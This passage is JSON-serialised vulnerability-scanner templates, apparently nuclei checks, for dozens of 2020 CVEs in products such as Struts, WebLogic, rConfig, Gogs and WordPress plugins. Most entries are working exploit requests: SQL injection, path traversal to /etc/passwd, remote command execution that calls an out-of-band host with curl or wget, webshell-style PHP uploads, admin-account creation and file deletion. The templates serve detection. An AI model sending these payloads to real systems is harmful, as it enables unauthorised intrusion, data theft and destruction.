Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10548","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/devices.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL+--+&searchColumn=n.id&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11529","info":{"name":"Grav <1.7  - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%252f%255cinteract.sh%252fa%253fb/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2020-23575","info":{"name":"Kyocera Printer d-COPIA253MF - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["root:.*:0:0:","bin:.*:1:1"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-11455","info":{"name":"LimeSurvey 4.1.11 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28188","info":{"name":"TerraMaster TOS - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["GET /include/makecvs.php?Event=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n","GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'%60 HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2020-11854","info":{"name":"Micro Focus UCMDB - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ucmdb-api/connect"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["HttpUcmdbServiceProviderFactoryImpl","ServerVersion=11.6.0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5410","info":{"name":"Spring Cloud Config Server - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-16139","info":{"name":"Cisco Unified IP Conference Station 7937G - Denial-of-Service","severity":"high"},"requests":[{"raw":["POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/xml"]},{"type":"word","words":["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-12256","info":{"name":"rConfig 3.9.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /devicemgmt.php?deviceId=\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(body_3, \"<script>alert(document.domain)</script>\") && contains(body_3, \"rConfig - Configuration Management\")","contains(content_type_3, \"text/html\")"],"condition":"and"}]}]},{"id":"CVE-2020-10220","info":{"name":"rConfig 3.9 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/commands.inc.php?searchOption=contains&searchField=vuln&search=search&searchColumn=command%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,md5('{{num}}'),0x5B50574E5D3C42523E)%20limit%200,1),NULL--"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20300","info":{"name":"WeiPHP 5.0 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5('999999'),0x7e),1)--+ "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["52c69e3a57331081823331c4e69d3f2"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2020-27735","info":{"name":"Wing FTP 6.4.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<frame name=\"hmcontent\" src=\"javascript:alert(document.domain)\" title=\"Content frame\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10973","info":{"name":"WAVLINK - Access Control","severity":"high"},"requests":[{"raw":["GET /backupsettings.dat HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Salted__"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6171","info":{"name":"CLink Office 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}?lang=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cp%20class=%22&p=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35338","info":{"name":"Wireless Multiplex Terminal Playout Server <=20.2.8 - Default Credential Detection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/"],"headers":{"Authorization":"Basic OnBva29u"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>WMT Server playout"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14750","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /console/css/%252e%252e%252fconsole.portal HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\ncmd: curl {{interactsh-url}}\nContent-Type: application/x-www-form-urlencoded\n\n_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread();\nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork();\njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\"connectionHandler\");\nfield.setAccessible(true);\nObject obj = field.get(adapter);\nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\"getServletRequest\").invoke(obj);\nString cmd = req.getHeader(\"cmd\");\nString[] cmds = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", cmd} : new String[]{\"/bin/sh\", \"-c\", cmd};\nif (cmd != null) {\n    String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\"\\\\A\").next();\n    weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\"getResponse\").invoke(req);\n    res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));\n    res.getServletOutputStream().flush();\n    res.getWriter().write(\"\");\n}executeThread.interrupt();\n\");\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["ADMINCONSOLESESSION="]},{"type":"regex","part":"body","regex":["<html><head></head><body>(.*)</body></html>"]}]}]},{"id":"CVE-2020-17530","info":{"name":"Apache Struts 2.0.0-2.5.25 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2020-14179","info":{"name":"Atlassian Jira Server/Data Center <8.5.8/8.6.0 - 8.11.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/QueryComponent!Default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","words":["{\"searchers\":","\"groups\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28429","info":{"name":"geojson2kml - Command Injection","severity":"critical"},"requests":[{"raw":["POST /convert HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n  \"fileName\": \"& echo \\\"{{randstr}}\\\" > {{filename}}.txt && ls\",\n  \"geoJsonData\": {\n    \"type\": \"FeatureCollection\",\n    \"features\": [\n      {\n        \"type\": \"Feature\",\n        \"geometry\": {\n          \"type\": \"Point\",\n          \"coordinates\": [102.0, 0.5]\n        },\n        \"properties\": {\n          \"prop0\": \"value0\"\n        }\n      }\n    ]\n  }\n}\n","GET /file/{{filename}}.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-29453","info":{"name":"Jira Server Pre-Auth - Arbitrary File Retrieval (WEB-INF, META-INF)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml","{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<groupId>com.atlassian.jira</groupId>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26248","info":{"name":"PrestaShop Product Comments <4.2.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2020-7943","info":{"name":"Puppet Server/PuppetDB - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/metrics/v1/mbeans"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["trapperkeeper"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28351","info":{"name":"Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-35951","info":{"name":"Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92\n\n\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"action\"\n\nqsm_remove_file_fd_question\n------WebKitFormBoundaryBJ17hSJBjuGrnW92\nContent-Disposition: form-data; name=\"file_url\"\n\n{{fullpath}}wp-content/plugins/quiz-master-next/README.md\n------WebKitFormBoundaryBJ17hSJBjuGrnW92--\n","GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"]},{"type":"word","part":"body","words":["{\"type\":\"success\",\"message\":\"File removed successfully\"}"]}],"extractors":[{"type":"regex","name":"fullpath","group":1,"regex":["not found in <b>([/a-z_]+)wp"],"internal":true,"part":"body"}]}]},{"id":"CVE-2020-10199","info":{"name":"Sonatype Nexus Repository Manager 3 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /service/rapture/session HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{base64(username)}}&password={{base64(password)}}\n","POST /service/rest/beta/repositories/bower/group HTTP/1.1\nHost: {{Hostname}}\nNX-ANTI-CSRF-TOKEN: 1\nCookie: NX-ANTI-CSRF-TOKEN=1\nContent-Type: application/json\n\n{\"name\": \"internal\", \"online\": \"true\", \"storage\": {\"blobStoreName\": \"default\", \"strictContentTypeValidation\": \"true\"}, \"group\": {\"memberNames\": [\"$\\\\A{3*3333}\"]}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Member repository does not exist: A9999"]},{"type":"status","status":[400]}]}]},{"id":"CVE-2020-2551","info":{"name":"Oracle WebLogic Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/console/login/LoginForm.jsp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["10.3.6.0","12.1.3.0","12.2.1.3","12.2.1.4"],"condition":"or"},{"type":"word","part":"body","words":["WebLogic"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-14408","info":{"name":"Agentejo Cockpit 0.10.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["redirectTo = '/92874';alert(document.domain)//280';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13638","info":{"name":"rConfig 3.9 - Authentication Bypass(Admin Login)","severity":"critical"},"requests":[{"raw":["POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=01b28e152ee044338224bf647275f8eb\n\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"passconf\"\n\n{{password}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"email\"\n\n{{email}}\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"editid\"\n\n\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"add\"\n\nadd\n--01b28e152ee044338224bf647275f8eb\nContent-Disposition: form-data; name=\"ulevelid\"\n\n9\n--01b28e152ee044338224bf647275f8eb--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["rConfig - Configuration Management","Logged in as","dashboadFieldSet"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-20285","info":{"name":"ZZcms - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /user/login.php HTTP/1.1\nHost: {{Hostname}}\nReferer: xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["fromurl\" type=\"hidden\" value=\"xss\"/><img src=\"#\" onerror=\"alert(document.domain)\"/>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-6637","info":{"name":"OpenSIS 7.3 - SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/account/index.php","{{BaseURL}}/opensis/index.php","{{BaseURL}}/index.php"],"body":"USERNAME=%27%29or%601%60%3D%601%60%3B--+-&PASSWORD=A&language=en&log=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQL STATEMENT:","<TD>UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER(NULL)or`1`=`1`;-- -')</TD>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-5847","info":{"name":"UnRaid <=6.80 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20echo%20md5(%22CVE-2020-5847%22);%20?%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["b13928fbcfff659363d7c7d1ec008d56"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-8641","info":{"name":"Lotus Core CMS 1.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-28208","info":{"name":"Rocket.Chat <3.9.1 - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nContent-Type: application/json\n\n{\"message\":\"{\\\"msg\\\":\\\"method\\\",\\\"method\\\":\\\"sendForgotPasswordEmail\\\",\\\"params\\\":[\\\"user@local.email\\\"],\\\"id\\\":\\\"3\\\"}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\\\":false","\"success\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24550","info":{"name":"EpiServer Find <13.2.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2020-11441","info":{"name":"phpMyAdmin 5.0.2 - CRLF Injection","severity":"medium"},"requests":[{"raw":["GET /index.php?route=/ HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?route=/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nset_session={{session}}&pma_username=%0D%0Atest:crlfinjection=1%0D%0A&pma_password=%0D%0Atest:crlfinjection=1%0D%0A&server=1&route=%2F&lang=en&token={{token}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["^test:crlfinjection=1$"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","name":"session","group":1,"regex":["name=\"set_session\" value=\"([a-z0-9]+)\""],"internal":true},{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"token\" value=\"([a-z0-9]+)\""],"internal":true}]}]},{"id":"CVE-2020-15867","info":{"name":"Gogs 0.5.5 - 0.12.2 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /user/login HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}\n","GET /repo/create HTTP/1.1\nHost: {{Hostname}}\n","POST /repo/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&user_id=1&repo_name={{randstr}}&private=on&description=&gitignores=&license=&readme=Default&auto_init=on\n","POST /{{username}}/{{randstr}}/settings/hooks/git/post-receive HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&content=%23%21%2Fbin%2Fbash%0D%0Acurl+{{interactsh-url}}\n","GET /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\n","POST /{{username}}/{{randstr}}/_new/master HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_csrf={{auth_csrf}}&last_commit={{last_commit}}&tree_path=test.txt&content=test&commit_summary=&commit_message=&commit_choice=direct\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body_1","words":["content=\"Gogs"]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"_csrf\" value=\"(.*)\""],"internal":true},{"type":"regex","name":"auth_csrf","group":1,"regex":["name=\"_csrf\" content=\"(.*)\""],"internal":true},{"type":"regex","name":"last_commit","group":1,"regex":["name=\"last_commit\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2020-35476","info":{"name":"OpenTSDB <=2.4.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://{{interactsh-url}}%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plotted","timing","cachehit"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-25780","info":{"name":"Commvault CommCell - Local File Inclusion","severity":"high"},"requests":[{"method":"POST","path":["http://{{Host}}:81/SearchSvc/CVSearchService.svc"],"body":"<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:tem=\"http://tempuri.org/\">\n   <soapenv:Header/>\n   <soapenv:Body>\n      <tem:downLoadFile>\n         <tem:path>c:/Windows/system.ini</tem:path>\n      </tem:downLoadFile>\n   </soapenv:Body>\n</soapenv:Envelope>\n","headers":{"Cookie":"Login","soapaction":"http://tempuri.org/ICVSearchSvc/downLoadFile","content-type":"text/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["downLoadFileResult"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-24186","info":{"name":"WordPress wpDiscuz <=7.0.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?p=1 HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"action\"\n\nwmuUploadFiles\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_nonce\"\n\n{{wmuSecurity}}\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\n\nundefined\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"rce.php\"\nContent-Type: image/png\n\n{{base64_decode('/9j/4WpFeGlmTU0q/f39af39Pv39/f39/f39/f2o/f39/cD9/f39/f39/f39/f/g/UpGSUb9/f39/9tD/f0M/QwK/f0=')}}\n<?php phpinfo();?>\n------WebKitFormBoundary88AhjLimsDMHU1Ak\nContent-Disposition: form-data; name=\"postId\"\n\n1\n------WebKitFormBoundary88AhjLimsDMHU1Ak--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["success\":true","fullname","shortname","url"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"wmuSecurity","group":1,"regex":["wmuSecurity\":\"([a-z0-9]+)"],"internal":true,"part":"body"},{"type":"regex","group":1,"regex":["\"url\":\"([a-z:\\\\/0-9-.]+)\""],"part":"body"}]}]},{"id":"CVE-2020-0618","info":{"name":"Microsoft SQL Server Reporting Services - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ReportServer/Pages/ReportViewer.aspx"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["view report"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-26214","info":{"name":"Alerta < 8.1.0 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/config"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '< 8.1.0')"]},{"type":"word","part":"body","words":["\"alarm_model\"","\"actions\"","\"severity\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""],"internal":true},{"type":"regex","group":1,"regex":["\"name\": \"Alerta ([0-9.]+)\""]}]}]},{"id":"CVE-2020-11547","info":{"name":"PRTG Network Monitor <20.1.57.1745 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/login.htm?type=probes","{{BaseURL}}/public/login.htm?type=requests","{{BaseURL}}/public/login.htm?type=treestat"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, 'Probe #1') && contains(body_2, '<span>Configuration Requests Sent</span>')"]},{"type":"word","part":"body","words":["prtg_network_monitor","Probes","Groups"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-19283","info":{"name":"Jeesns 1.4.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/newVersion?callback=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-3187","info":{"name":"Cisco Adaptive Security Appliance Software/Cisco Firepower Threat Defense - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/+CSCOE+/session_password.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["webvpn","Webvpn"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-13927","info":{"name":"Airflow Experimental <1.10.11 - REST API Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/latest_runs"],"matchers":[{"type":"word","part":"body","words":["\"dag_run_url\":","\"dag_id\":","\"items\":"],"condition":"and"}]}]},{"id":"CVE-2020-13820","info":{"name":"Extreme Management Center 8.4.1.24 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OneView/view/center?a%27+type%3d+%27text%27+autofocus+onfocus%3d%27alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus='alert(document.domain)","Extreme Management 